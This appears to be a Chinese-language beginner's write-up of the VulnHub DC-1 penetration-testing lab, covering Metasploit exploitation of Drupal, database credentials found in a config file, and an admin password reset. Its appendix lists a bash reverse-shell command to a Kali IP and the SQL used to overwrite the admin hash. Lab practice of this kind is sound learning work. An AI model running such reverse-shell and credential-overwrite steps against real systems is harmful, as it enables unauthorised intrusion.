DC-1入门练习

**

渗透测试入门靶机练习DC-1

**

	大家好!第一次搭建自己的博客,对这个环境有点陌生,作为一名网络安全学习者很高兴为大家提供一些踩坑经验以及学习教程如有不足,或错误还请大家指点。

#环境搭建
1. 首先准备好DC-1靶机,其实就是一个虚拟机ova文件
下载地址:https://download.vulnhub.com/dc/DC-1.zip
其他DC靶机地址只需修改上面DC-后面数字即可
2.打开次虚拟机创建DC-1靶机:
DC-1入门练习_第1张图片
3. 创建好后设置网络为net模式,查看Mac地址:DC-1入门练习_第2张图片
#寻找flag1
##扫描
4. 用nmap扫描查找目标网段主句机根据mac找到目标主机地址:DC-1入门练习_第3张图片
5. 然后用nmap继续扫描这个主机开放端口号:(发现22,80端口开放这里可以考虑ssh爆破,80端口访问查看)
DC-1入门练习_第4张图片
DC-1入门练习_第5张图片

##用msfconsole进行搜索攻击
1.搜索drupal
DC-1入门练习_第6张图片
2. 使用这个漏洞设置payoad
在这里插入图片描述
DC-1入门练习_第7张图片
3.设置rhost进行exploit
DC-1入门练习_第8张图片
4.攻击成功后我们可以看到当前建立会话路径以及网站目录
DC-1入门练习_第9张图片
5.打开flag1,打开查看(根据提示去查看web-config啥也没)
在这里插入图片描述
##寻找flag2
根据flag1的提示经过多次尝试发现配置文件在sites/defaults/default.settings.php这里打开发现flag相关配置信息如下:
DC-1入门练习_第10张图片

flag2

  • Brute force and dictionary attacks aren’t the
  • only ways to gain access (and you WILL need access).
  • What can you do with these credentials?

*/

$databases = array (
‘default’ =>
array (
‘default’ =>
array (
‘database’ => ‘drupaldb’,
‘username’ => ‘dbuser’,
‘password’ => ‘R0ck3t’,
‘host’ => ‘localhost’,
‘port’ => ‘’,
‘driver’ => ‘mysql’,
‘prefix’ => ‘’,

##反弹shell

  1. 进入shell查看开放端口,发现3306端口开放,我们可以尝试连接mysql -udbuser -pR0ck3t
    DC-1入门练习_第11张图片
  2. 发现无法连接到mysql,我们尝试反弹shell,但是无响应(这里有一点要说明反弹shell的ip是自kali的ip不是靶场的ip)
    DC-1入门练习_第12张图片
  3. 借助Python反弹shell命令如下:python -c ‘import pty;pty.spawn("/bin/bash")’
    发现反弹成功,尝试登陆mysql成功:
    DC-1入门练习_第13张图片
  4.  登陆数据库查看表字段:
    

DC-1入门练习_第14张图片DC-1入门练习_第15张图片
3. 进入users表查看:(发现账号密码,但是密码是加密过的,无法破解这里要么爆破要么,只能修改密码)
DC-1入门练习_第16张图片
4. 使用drupal 自带脚本重新生成密码,然后将加密的密文保存(这里要特别注意,脚本是在/var/www目录下生成的不然会报错)
DC-1入门练习_第17张图片
5. 进入数据库用密文更新密码(这里强调要进入drupal数据库下不然会报错)
DC-1入门练习_第18张图片
7.使用账号密码登录(发现flag3):DC-1入门练习_第19张图片
DC-1入门练习_第20张图片

  1. 附录关键命令:
    mysql -udbuser -pR0ck3t
    bash -i >& /dev/tcp/192.168.1.141/2333 0>&1
    python -c ‘import pty;pty.spawn("/bin/bash")’
    php scripts/password-hash.sh admin

S S SDjIWcmRpBGCR67FkiVndXI3qiKK/PW6qomBpw5c1l3FxmzKi8GW5

update users set pass=“ S S SDjIWcmRpBGCR67FkiVndXI3qiKK/PW6qomBpw5c1l3FxmzKi8GW5” where uid=1;
其他flag请看下一篇

你可能感兴趣的:(DC-1入门练习)